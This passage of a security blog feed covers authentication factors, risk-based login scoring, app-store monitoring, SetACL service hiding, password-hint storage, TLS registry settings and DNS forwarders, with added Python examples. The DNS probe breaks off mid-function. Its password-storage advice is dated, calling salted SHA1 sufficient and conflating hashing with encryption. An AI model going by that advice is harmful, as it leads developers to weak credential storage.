This is 4 factors.<br /><br /><b>Something you know;</b> PIN, password, passcode, passphrase, pictures in a certain order, last 4 digits of a credit card (even though this is something you have, it is a known, never-changing string).<br /><br /><b>Something you have;</b> a key, a key-card, USB fob, certificate, smart-card, RFID chip, SMS/phone-call receiving phone, Bluetooth paired phone or other device, laptop, tablet, the phone itself.<br /><br /><b>Something you are; </b>fingerprint, iris scan, voiceprint, DNA sequence.<br />I will rant on biometrics later, but you can't re-issue a fingerprint, so if it gets compromised and copied by someone you are out of luck.<br /><br /><b>Somewhere you are; </b>GPS location, IP geolocation (though as this would be checked in-band, on the same connection you may be using to access the service, the security doesn't increase), a landline or mobile phone could also be somewhere you are, e.g. you login to an app and it calls you on a separate phone at that same location to ensure you meant to.<br /><br />Let's look at some examples.<br /><ul><li>You login to your computer with a username and password; this is <b>1 factor</b> of authentication, just a password.</li><li>You login to your computer with a username and password, then onto a super-secret corporate system with a different username and password; this is still <b>1 factor</b> of authentication. You only used a username and password.</li><li>You login to your PC using a swipe card only; this is still <b>1 factor</b> of authentication. Yes, you used something you have, but it was not cumulative on something you know.</li><li>You login to your PC using your username, password and secure USB key; this is now <b>2 factors</b> of authentication, something you know and something you have.</li><li>You login to your PC using your username, password, thumbprint and secure USB key; this is now <b>3 factors</b> of authentication: something you know, something you have and something you are. 
</li><li>You login to your netbanking via their app with username, password, fob token code, and your thumbprint on the home button. The app has rights to your phone's GPS; it disallows transfers over $1000 from anywhere but inside your own home or registered place of work, so if you go to transfer $1001 to another account and it allows you due to the registered GPS, this could be considered <b>4 factors</b> of authentication: something you know, have, are, and somewhere you are, all checked to ensure valid authorization.</li></ul>Now comes the paradigm shifting. I wish it was me that thought of these.<br /><br /><b>Device profiling</b><br />This makes the device a factor, specifically a second factor. <br />This will do things like take the IP you are logging in from, weighted with things like browser headers, and put them in a database; if it sees these change dramatically it can deny you access.<br />A good example showing the power of this hidden data that you send can be seen at the EFF's Panopticlick here; <a href="https://panopticlick.eff.org/">https://panopticlick.eff.org/</a><br />There are certain banking and social media apps that do this already, alerting you via email when you have logged in from a new device. <br /><br /><b>Risk based authentication</b><br />Awesome idea, basically the application has some smarts. Similar to the above, it does some device profiling and then if you fail it, it either challenges you for more authentication or simply denies you access. It has risk scores that it assigns to things, so risk +1 if you are logging in at a different time, risk +9000 if you are logging in from a country with a bad reputation that you have never logged in from before. This still works in the factorising model, but doesn't force a user to enter every factor every time; it is an extension of the paradigm.<br /><br /><b>Pingrid and their ilk</b><br />As I mentioned last time, these aren't two-factor. 
They are a challenge, with a user response based on something they know. Interestingly, I think they do increase security, but still not as much as a second factor. This really doesn't fit the factorised model. See their demo here; <a href="https://www.winfrasoftbank.com/MyAccounts/Default.aspx">https://www.winfrasoftbank.com/MyAccounts/Default.aspx</a><br />You can see how, due to the randomness of the numbers, it does reduce the likelihood that the user's "password" will ever be compromised by an over-the-shoulder or man-in-the-middle attack, but again, capture enough views of the user's login through a screen scraper and you have them. It still doesn't stop man-in-the-browser attacks (where malicious code waits for you to authenticate to your bank, then distracts you and gives control of that tab to the remote bad guys to transfer out your cash).<br /><br />That being said, I think they are probably making the authentication process more complicated than it needs to be and not more secure. Hard tokens that are transparent to the user, like a YubiKey or smart cards, are much, much more secure.<br /><br />So, uhh, disrupting the paradigm: I thought I could make a case that the above three did disrupt the paradigm, but they don't. I started this article all gung-ho to prove to myself they did, but they simply extend what we already have.<br />Device profiling and risk based authentication either work with existing factors of authentication, or make a string of numbers unique to you and your device part of auth (just like a certificate or token, and thus are a second factor), and Pingrid is simply an extension of single factor authentication.<br /><br />Seeing as I mentioned Schneier last time I posted about auth, I had a look to see if he has discussed Pingrid or others; he hasn't. 
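<br /><br />The device profiling and risk based authentication sections above, as an added example that is not from the original post or from any vendor: a per-user profile learned from past logins, a device fingerprint built from the passive signals a browser sends, and a score that picks allow, challenge for another factor, or deny. The +1 and +9000 weights are the post's illustration; the other weights, the two thresholds, the fingerprint inputs and the placeholder country code are my assumptions.<br /><br />

```python
from __future__ import annotations

import hashlib
from dataclasses import dataclass, field

# Added example; not code from the original post or from any vendor's product.
# Weights follow the post's illustration (+1 for an unusual time, +9000 for a
# never-seen country with a bad reputation); the remaining weights, the two
# thresholds, the fingerprint inputs and the placeholder country code "ZZ"
# are constructed assumptions for the demonstration.
BAD_REPUTATION_COUNTRIES = {"ZZ"}   # placeholder code, not a real country

WEIGHT_NEW_DEVICE = 3
WEIGHT_UNUSUAL_HOUR = 1
WEIGHT_NEW_COUNTRY = 5
WEIGHT_NEW_BAD_COUNTRY = 9000

CHALLENGE_AT = 3     # at or above: ask for another factor before allowing
DENY_AT = 100        # at or above: refuse without offering a challenge


@dataclass(frozen=True)
class LoginAttempt:
    ip: str
    user_agent: str
    accept_language: str
    country: str        # country code as resolved by the service's geo lookup
    hour: int           # hour of day (0-23) in the user's usual time zone


@dataclass
class UserProfile:
    """What the service has learned from this user's past successful logins."""
    devices: set[str] = field(default_factory=set)
    countries: set[str] = field(default_factory=set)
    hours: set[int] = field(default_factory=set)


def device_fingerprint(attempt: LoginAttempt) -> str:
    """Hash of passive signals the browser sends anyway (the kind of data
    Panopticlick displays). Only the first three octets of the IP go in, so a
    DHCP lease change at home does not register as a brand-new device."""
    network = ".".join(attempt.ip.split(".")[:3])
    raw = "|".join((network, attempt.user_agent, attempt.accept_language))
    return hashlib.sha256(raw.encode("utf-8")).hexdigest()


def risk_score(profile: UserProfile, attempt: LoginAttempt) -> tuple[int, list[str]]:
    """Add up the risk of one attempt against the profile, keeping the reasons
    so the decision can be logged and explained to the user."""
    score, reasons = 0, []
    if device_fingerprint(attempt) not in profile.devices:
        score += WEIGHT_NEW_DEVICE
        reasons.append("unrecognised device fingerprint")
    if profile.hours and attempt.hour not in profile.hours:
        score += WEIGHT_UNUSUAL_HOUR
        reasons.append("login outside usual hours")
    if profile.countries and attempt.country not in profile.countries:
        if attempt.country in BAD_REPUTATION_COUNTRIES:
            score += WEIGHT_NEW_BAD_COUNTRY
            reasons.append("never-seen country with a bad reputation")
        else:
            score += WEIGHT_NEW_COUNTRY
            reasons.append("never-seen country")
    return score, reasons


def decide(score: int) -> str:
    """Map a score onto the three outcomes the post describes."""
    if score >= DENY_AT:
        return "deny"
    if score >= CHALLENGE_AT:
        return "challenge"
    return "allow"


def record_success(profile: UserProfile, attempt: LoginAttempt) -> None:
    """Only a fully authenticated login teaches the profile something new;
    a denied or unanswered challenge must not widen what is trusted."""
    profile.devices.add(device_fingerprint(attempt))
    profile.countries.add(attempt.country)
    profile.hours.add(attempt.hour)


if __name__ == "__main__":
    # Constructed history: one known home login from a documentation IP range.
    profile = UserProfile()
    home = LoginAttempt("203.0.113.10", "Mozilla/5.0 (X11; Linux x86_64)", "en-AU", "AU", 20)
    record_success(profile, home)
    for attempt in (
        LoginAttempt("203.0.113.77", home.user_agent, "en-AU", "AU", 21),  # same device, new lease
        LoginAttempt("198.51.100.5", "Mozilla/5.0 (Windows NT 10.0)", "en-AU", "AU", 20),
        LoginAttempt("192.0.2.9", "Mozilla/5.0 (Windows NT 10.0)", "en-US", "ZZ", 3),
    ):
        score, reasons = risk_score(profile, attempt)
        print(f"{decide(score):9} score={score:<5} {', '.join(reasons) or 'matches profile'}")
```
<br /><br />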
But I did find the below, which is awesome; <br /><a href="http://www.schneierfacts.com/fact/vote/631">http://www.schneierfacts.com/fact/vote/631</a>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-81892049943818362732014-08-16T15:53:00.000+10:002016-07-25T16:04:08.461+10:00Playing with googleSo I was recently having a discussion with a vendor about the insecurity versus usability of the Google Play store: yep, there is <a href="http://www.pcworld.com/article/2099421/report-malwareinfected-android-apps-spike-in-the-google-play-store.html">malware there</a>, yep, there are <a href="http://www.tomsguide.com/us/data-stealing-google-play,news-19059.html">copycat scam apps</a>. But Google will eventually get it under control, just as Apple has <a href="http://bgr.com/2013/03/06/ios-android-user-data-leaks-study-361608/">done...</a><br /><br />Ok so you can't trust either of them, but I think Apple is actually doing a better job of keeping the look-alike scam apps out, at least I haven't heard of any yet, and this is coming from me, a very anti-Apple person. <br /><br />So what do you do if you have written an Android app? 
Well you could host it on your own site, but then you need to reduce your customers' security by making them set their device to allow apps to be installed from anywhere, opening them up to the drive-by downloads that are becoming prevalent in Android land (mainly due to some manufacturers enabling this setting by default).<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-avgpXLau3ig/U7o0pvPpaYI/AAAAAAAAKC4/LAhFRex6MGY/s1600/Screenshot_2014-07-07-12-58-25.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://4.bp.blogspot.com/-avgpXLau3ig/U7o0pvPpaYI/AAAAAAAAKC4/LAhFRex6MGY/s1600/Screenshot_2014-07-07-12-58-25.png" width="112" /></a></div>You could host a QR code on your site and point this to your Play store app...<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-T2eiV36kJT0/U7o1gYfprSI/AAAAAAAAKDE/21oqcZ5r410/s1600/qr-codes.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://3.bp.blogspot.com/-T2eiV36kJT0/U7o1gYfprSI/AAAAAAAAKDE/21oqcZ5r410/s1600/qr-codes.jpg" width="240" /></a></div>Maybe just a link on your site back to the Play store to ensure they get the right version of the app.<br /><br />This got me thinking: it doesn't really protect you from those that just look through the store for apps from your company, so you should protect yourself in some other way. 
I use Google Alerts already to monitor stuff I am interested in, as well as comments about things I am interested in for <a href="http://lifehacker.com/5879922/use-google-alerts-as-an-identity-theft-personal-watchdog">security reasons</a>.<br /><br />This is where I thought I could make a search alert for: site:play.google.com appname<br />I wanted to try it out first, so I did: site:play.google.com commbank<br />Commbank is a big bank in Australia, and they have a few apps; one caught my attention; <a href="https://play.google.com/store/apps/details?id=au.com.commbank.hr.sidekick&amp;hl=en">https://play.google.com/store/apps/details?id=au.com.commbank.hr.sidekick&amp;hl=en</a><br />Looks to me like Commbank trust the store so much that they trust a third party to put up an app for them for their users to access the intranet. The company that listed the app at time of writing was <a href="http://www.gpssolutionsdevelopers.com/">http://www.gpssolutionsdevelopers.com/</a>, whose site looks like it is what is being loaded for the app;<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-oVKlSq9GIyk/U7o4nSSunBI/AAAAAAAAKDQ/zAlxl4prKJM/s1600/www.gpssolutionsdevelopers.com.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://2.bp.blogspot.com/-oVKlSq9GIyk/U7o4nSSunBI/AAAAAAAAKDQ/zAlxl4prKJM/s1600/www.gpssolutionsdevelopers.com.png" width="266" /></a></div>The domain was suspiciously registered on the 28th of January this year.<br />I might need to reinstall this app and do a packet capture to see what web services it is trying to hit on this site, but this site is not HTTPS, and is hosted on a shared host that has unencrypted FTP, SMTP and IMAP enabled. I let someone I have met from Commbank's IT security team know, and this was all amazingly fixed within a few hours. 
Props to them.<br />I did a packet capture post their fixes and it is all over SSL/TLS now.<br /><br />So anyway I guess the takeaway is, if you want to add some security even for Google Play apps, you can set up a Google Alert at <a href="http://www.google.com/alerts">http://www.google.com/alerts</a>, do one for <i>site:play.google.com appname</i>, set it for As-it-happens and hope you never get that email.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-84745393457203807732014-04-07T18:01:00.000+10:002014-04-07T18:01:00.178+10:00Service hiding/protectionThis is a bit of operational security, but it took me a lot longer than I would have liked to do, and no one had an example like the below. This command will use the open source access control list command line utility <a href="http://helgeklein.com/setacl/">SetACL</a> to lock down a service so that the specified user can't stop or start it; on testing it is even better than that: the service disappears from the services manager.<br /><br /><i>setacl.exe -ot srv -on "Service Name" -ace "n:domain\username;p:start_stop;m:deny" -actn ace</i><br /><br />This is obviously a really good idea if you have admins of a box that you don't want to be able to stop a key service; it could also allow you to stop a malicious user from seeing a specific service, depending on the malicious user's method of getting onto your server.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-31118158838840318422013-11-25T22:35:00.001+11:002018-03-07T14:29:32.557+11:00Password HintsOK let me preface this by saying this: I absolutely hate password hints and secret questions. Generally speaking, anything you put in there can be found by friending someone on Facebook, a quick Google or simply guessing. They are the epitome of a bad idea; sure, they have some use. 
If you forget your password, the hint, if constructed correctly, could remind you and only you; however most people don't understand this.<br />If it is a secret question and answer, where the question is predefined such as mother's maiden name, it can take a few guesses (Smith, anyone?), or a quick google.com search, and you will have it. Everything else is trivial, and this was how Sarah Palin's Yahoo email account was humorously compromised back in <a href="http://www.wired.com/threatlevel/2008/09/palin-e-mail-ha/">2008</a>.<br /><br />Forgetting all that, Adobe gave us another insight as to why it is bad.<br /><br />I know a lot has been said about Adobe, including the excellent (although conservative in the number of users impacted) article by Brian Krebs <a href="http://krebsonsecurity.com/2013/10/adobe-breach-impacted-at-least-38-million-users/">here.</a><br /><br />But there is something else that needs to be learnt from this breach.<br />Sure, your password hint could be terrible, but maybe the web application logs someone's IP when they go to it, for later alerting etc. if a bad guy does compromise the account. But what if the DB gets walked, and all those juicy password hints or secret questions and answers are stored in plain text... then you have a problem even if you correctly store your passwords (which Adobe didn't).<br /><br />So let's say you do correctly store your password as a per-user salted SHA1+ hash, good, but now you allow users to have a password hint like Adobe. When someone's password hint is simply their password in another language, it falls very quickly. For example (this is not a real entry, but made to look like one from the Adobe breach);<br /><br /><span class="comment">78114563-|--|-notreal@fakedomain.com-|-BsscHGd8aIjiwxG2CaWrHSw==-|-Gato x3|--</span><br /><br />If we forgive the obviously non-hashed password in the 4th column, we see in the last column the password hint is simply Gato x3, or, you know, maybe Cat typed out three times. 
So even if this entry had an irreversibly hashed password, the hint would give it all away if the DB were accessed.<br />Maybe they should instead store their hint as a reversibly encrypted string with an individual key for each user. This would mean that when the user wants to use their password hint, the server would look up the key for that username from an internal key server and decrypt the hint. It would mean that if the DB is walked via an SQL injection or direct attack they aren't necessarily going to get the keys to decrypt the password hints. For a secret question and answer, you should salt and hash the answer, and if you are using user-defined questions you should encrypt those too, just to reduce what is leaked...<br /><br />Using an encrypted password with the same decryption key for all users, or using an unsalted hash, means that the resulting password string, whether it is BsscHGd8aIjiwxG2CaWrHSw== or 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8, will be the same across all users who chose that password, meaning if you break one you break them all. The same goes for your "password hint" or "secret question and answer", should people take my advice and start encrypting them.<br /><br />Of course all of this only works if you care about security. If you aren't going to hash your passwords, or worse, store them in plain text as <a href="https://krebsonsecurity.com/2013/11/cupid-media-hack-exposed-42m-passwords/">Cupid Media</a> did, then you probably don't care about users' password hints, and will probably store them in plain text.<br />Realistically no-one has any excuse now: Google Authenticator for two-factor has been open sourced, and OpenID or SAML can be used to authenticate you to a central store and then you are done, like UbuntuForums did post their breach, moving to UbuntuOne, the OpenID provider. People like Adobe should really switch to one of these, to reduce their authentication load. 
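<br /><br />As an added example (not Adobe's code and not from the original post), here is the per-user salted hash the paragraphs above recommend, applied to both passwords and secret-question answers, next to the unsalted hash they warn against; the unsalted SHA-256 of the constructed input "password" reproduces the second string quoted above, which is exactly why every user who picked it would share one stored value. The function names, the record layout and the choice of PBKDF2 are my assumptions.<br /><br />

```python
import hashlib
import hmac
import os
import unicodedata

# Added example, not code from the original post or from Adobe. The record
# layout and function names are constructed for the demonstration. PBKDF2 from
# the standard library stands in for a dedicated password hash (bcrypt, scrypt,
# Argon2) because it shows the per-user-salt point without any dependencies.
ITERATIONS = 100_000
SALT_BYTES = 16


def unsalted_hash(secret: str, algorithm: str = "sha256") -> str:
    """The pattern the post warns against: with no salt, every user who chose
    the same secret ends up with the same stored string, so one crack covers
    all of them."""
    return hashlib.new(algorithm, secret.encode("utf-8")).hexdigest()


def derive(secret: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"), salt, iterations)


def store_secret(secret: str) -> dict:
    """The columns that belong in the authentication table for one user: a
    fresh random salt, the work factor used, and the derived hash. Nothing
    here can be reversed to recover the secret."""
    salt = os.urandom(SALT_BYTES)
    return {
        "salt": salt.hex(),
        "iterations": ITERATIONS,
        "hash": derive(secret, salt).hex(),
    }


def verify_secret(candidate: str, record: dict) -> bool:
    computed = derive(candidate, bytes.fromhex(record["salt"]), record["iterations"])
    # Constant-time comparison so the check itself leaks nothing about how
    # many leading bytes matched.
    return hmac.compare_digest(computed, bytes.fromhex(record["hash"]))


def normalise_answer(answer: str) -> str:
    """Secret-question answers are matched loosely ("Smith", " smith ", "SMITH"
    should all pass), so normalise before hashing; a hash of the raw string
    would demand an exact-case, exact-spacing match users rarely reproduce."""
    decomposed = unicodedata.normalize("NFKD", answer)
    without_accents = "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    return " ".join(without_accents.casefold().split())


def store_answer(answer: str) -> dict:
    """Salt and hash the answer exactly like a password, as the post advises."""
    return store_secret(normalise_answer(answer))


def verify_answer(candidate: str, record: dict) -> bool:
    return verify_secret(normalise_answer(candidate), record)


def distinct_stored_hashes(secret: str, users: int) -> int:
    """How many different stored strings `users` people who all chose `secret`
    produce: always 1 for an unsalted hash, `users` with per-user salts."""
    return len({store_secret(secret)["hash"] for _ in range(users)})


if __name__ == "__main__":
    # The unsalted SHA-256 of the constructed input "password" is the second
    # string quoted in the post: every user who picked it shares that hash.
    print(unsalted_hash("password"))
    print("unsalted, 3 users:", len({unsalted_hash("password") for _ in range(3)}))
    print("salted,   3 users:", distinct_stored_hashes("password", 3))
    record = store_answer("  Smith ")
    print("answer check:", verify_answer("SMITH", record), verify_answer("Smyth", record))
```
<br /><br />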
The users should be forced at these central providers to use 2-factor auth. If you forget your password at one of these central providers then you have a convoluted way to retrieve it via out-of-band identification, via either a partnership with a bank or another multi-vendor approach, e.g. go into one of those news agencies and show 100 points of ID to get your password reset.<br /><br />The point I am trying to make is this: if it is used for authentication it should be encrypted, preferably with a sufficiently strong hash (SHA1 or greater) that is salted. Nothing but the username and row ID of your authentication table should be plain text. It is only a matter of time before these passwords in the 10GB Adobe database are broken and the key used to decrypt them is found, if it hasn't happened already.<br /><br />Add these ~130 million Adobe accounts to the 42 million from Cupid Media and I think we should declare this month Change Password November. I know the few sites that used the same password as my account on Adobe have now all been changed; have yours? If you use the same password everywhere, then now is the time to look at <a href="http://keepass.info/">KeePass</a> or <a href="https://lastpass.com/">LastPass</a> to store your single-use passwords in a manner that allows for your protection. Heck, even Google's Chrome and Firefox have built-in password managers with cloud sync and encryption, so there really is no excuse.<br /><br />I am doing a CTF for some peeps, thought I'd put this here to be searchable.. 
these are the real sums of these phrases;<br />2D579CD75056723657B8FA68FA6626C245CD362030159965EFBDF41DA2D67ADF:redherring<br />86DB5B1C2D9C1854FE5B80318FBC806C53EDD2C5DBABAFA42CC909A867AE3E21:RedHerring<br />BC1A7086C334A3C3E2AC638DF4C82A58DEBC6CF2DAF05C4B1D17E9896BC69908:red herring <br />Or check it here; https://passwordsgenerator.net/sha256-hash-generator/ or on your bash shell with <i>echo -n redherring | sha256sum</i>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-33452908861420006762013-01-21T01:31:00.001+11:002013-10-02T10:10:14.302+10:00SSL is dead, long live TLS1.0, er 1.1, er 1.xSo I thought I would post this as I couldn't find a definitive answer anywhere: how to enable HTTP Strict Transport Security, or HSTS, on IIS 7.5 on Windows 2008 R2. It is really, really simple.<br />Open the IIS manager, navigate to the site and go to HTTP Response Headers. 
Add a new HTTP Response header with a name of Strict-Transport-Security and a value of max-age=300, like the below;<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-u2gyPigIx2s/UPUL7PqNjEI/AAAAAAAAAbY/mCbYVcVpBbI/s1600/tls.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="181" src="http://2.bp.blogspot.com/-u2gyPigIx2s/UPUL7PqNjEI/AAAAAAAAAbY/mCbYVcVpBbI/s320/tls.png" width="320" /></a></div><br /><br />Then click OK; in my experience you will more than likely need to restart IIS to get this to work.<br /><br />I also thought I might mention how to enable TLS 1.1 and TLS 1.2: save the below as a .reg file and do the old regedit /s file.reg from an elevated prompt to get it imported, then reboot.<br /><br /><i>Windows Registry Editor Version 5.00<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2]<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client]<br />"Enabled"=dword:00000001<br />"DisabledByDefault"=dword:00000000<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server]<br />"Enabled"=dword:00000001<br />"DisabledByDefault"=dword:00000000<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1]<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Client]<br />"Enabled"=dword:00000001<br />"DisabledByDefault"=dword:00000000<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server]<br />"Enabled"=dword:00000001<br />"DisabledByDefault"=dword:00000000</i><br /><br />Another awesome page I found during my travels that needs more publicity is by Qualys; it does a full SSL/TLS implementation test and 
tells you how you fared; <br /><!--[if gte mso 9]>
Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" 
SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> </w:LatentStyles></xml><![endif]--><a href="https://www.ssllabs.com/ssltest/">https://www.ssllabs.com/ssltest/</a><br />After this you may want to change your cipher suites, which in Server 2008 R2 can now be done through gpedit. Anyway, that is it for this quick brain dump.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-7029640843029631232012-12-05T20:35:00.000+11:002013-01-21T01:37:02.073+11:00DNS relay serversThis one may be boring security for some, but a lot of people I meet who claim to be in security forget the very important, possibly critical CIA model of security. No, I don't mean the Central Intelligence Agency; I mean Confidentiality, Integrity and Availability. These three things are the key to good security infrastructure, and DNS is part of at least the last two.<br /><br />Generally speaking, if you are a small to medium business you will have a DNS server in your environment. You could just leave it at the default, pointed at the root servers to do external resolution for your clients, but in geographically remote countries like Australia that can lead to resolution failures because of the latency to the root servers that is sometimes experienced. If you have a big enough pipe this latency is manageable and won't cause an issue, though a bit of contention can begin to cause problems. My suggestion was usually to specify DNS relay servers (forwarders, in Windows DNS terms). This lets your server relay its requests to your ISP, which is especially good if your ISP blocks lookups to the root servers, something I have also seen. But should you just specify your ISP's DNS? Well, when I first started doing this that is what I did. 
Till the ISP the client was using had their DNS cache poisoned and a few popular sites started resolving badly, and there were other times when the ISP's DNS failed or changed without notice.<br />So I started setting a second or third server that was with a different ISP but known to be publicly accessible, either Optus or Telstra, as they are/were our biggest ISPs in Australia at the time. I eventually started also adding OpenDNS and Google's DNS to my repertoire, especially OpenDNS's premium services with clients that wanted the blocking that a proxy gives without the infrastructure or upfront cost. Yes, I know you can get round it by simply knowing the IP of a malicious site, but it was better than unencumbered internet feeds. I am not a shill; I don't even have an OpenDNS account anymore.<br /><br />This worked very well. But just today, while troubleshooting an issue, I fired up WinMTR, a Windows port of the Linux tool Multi-Trace-Route (MTR), very useful for finding a hop in your route that could be having issues. As usual I used these memorised Optus and Telstra DNS servers to check my routes and I found packet loss (there was an issue with my ISP's bridging router into PIPE, it seemed). 
Then I tested to my ISP's DNS: all good, no packets dropped and only 4 hops. Then I thought, hmm, I should test to Google's open DNS servers, just to see:<br />
|------------------------------------------------------------------------------------------|<br />
|                                    WinMTR statistics                                     |<br />
|                                  Host  -    % | Sent | Recv | Best | Avrg | Wrst | Last |<br />
|-----------------------------------------------|------|------|------|------|------|------|<br />
|                   x-x-x-x.tpgi.com.au -     0 |    5 |   55 |    1 |    3 |   81 |    4 |<br />
|                   x.x.x-x.tpgi.com.au -     2 |   55 |   54 |   23 |   28 |  114 |   24 |<br />
| syd-nxg-men-crt2-ge-3-1-0.tpgi.com.au -     0 |   55 |   55 |   48 |   69 |  159 |   67 |<br />
|                          202.7.171.46 -     0 |   55 |   55 |   25 |   33 |  124 |   28 |<br />
|                          72.14.237.21 -     4 |   55 |   53 |   26 |   28 |   43 |   32 |<br />
|        google-public-dns-a.google.com -     2 |   54 |   53 |   44 |   70 |  151 |   76 |<br />
|_______________________________________________|______|______|______|______|______|______|<br />
   WinMTR - 0.8. Copyleft @2000-2002 Vasile Laurentiu Stanimir  ( stanimir@cr.nivis.com )<br /><br />
Yeah, there is a little packet loss there, issues with my connection, but only 6 hops is impressive. 
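Comparing candidate forwarders by measurement, as the WinMTR run above does by hand, can also be scripted. Below is an added example of mine (not code from this post, from WinMTR or from any resolver operator) that sends real A-record queries to each resolver over UDP/53, rejects any reply whose transaction id does not match the query (a stale or spoofed reply is counted as a failure, which matters given the cache-poisoning story above), and reports loss and median round-trip time per resolver. It assumes UDP/53 is reachable and uses example.com as the query name; the embedded reply bytes are constructed for the offline demonstration, not captured from a server.

```python
"""Probe candidate DNS forwarders for latency and loss, using only the standard library."""
import secrets
import socket
import statistics
import struct
import time


def build_query(name: str, txid: int) -> bytes:
    """Wire-format DNS query: 12-byte header with RD set, one question <name> A IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def _read_name(data: bytes, offset: int):
    """Decode a possibly compressed name; return (name, offset just past it in the record)."""
    labels, jumped, end = [], False, offset
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # two-byte compression pointer to an earlier name
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            if not jumped:
                end = offset
            return ".".join(labels), end
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(data: bytes, expected_txid: int) -> dict:
    """Return rcode and any IPv4 answers; reject a reply whose txid does not match ours."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid:
        raise ValueError("transaction id mismatch: stale or spoofed reply")
    offset = 12
    for _ in range(qdcount):  # skip the echoed question section
        _, offset = _read_name(data, offset)
        offset += 4           # QTYPE + QCLASS
    addresses = []
    for _ in range(ancount):
        _, offset = _read_name(data, offset)
        rtype, _rclass, _ttl, rdlength = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        if rtype == 1 and rdlength == 4:
            addresses.append(".".join(str(b) for b in data[offset:offset + 4]))
        offset += rdlength
    return {"rcode": flags & 0x000F, "addresses": addresses}


def summarise(rtts_ms, sent: int) -> dict:
    """Loss percentage and median RTT (ms) computed from the RTTs of successful probes."""
    loss = 100.0 * (sent - len(rtts_ms)) / sent
    return {"loss_pct": loss, "median_ms": statistics.median(rtts_ms) if rtts_ms else None}


def probe(resolver: str, name: str = "example.com", count: int = 5, timeout: float = 2.0) -> dict:
    """Send <count> queries; a timeout, socket error or malformed/mismatched reply counts as loss."""
    rtts = []
    for _ in range(count):
        txid = secrets.randbelow(65536)  # unpredictable txid, as a proper stub resolver uses
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(timeout)
        try:
            started = time.perf_counter()
            sock.sendto(build_query(name, txid), (resolver, 53))
            data, _ = sock.recvfrom(512)
            if parse_response(data, txid)["rcode"] == 0:
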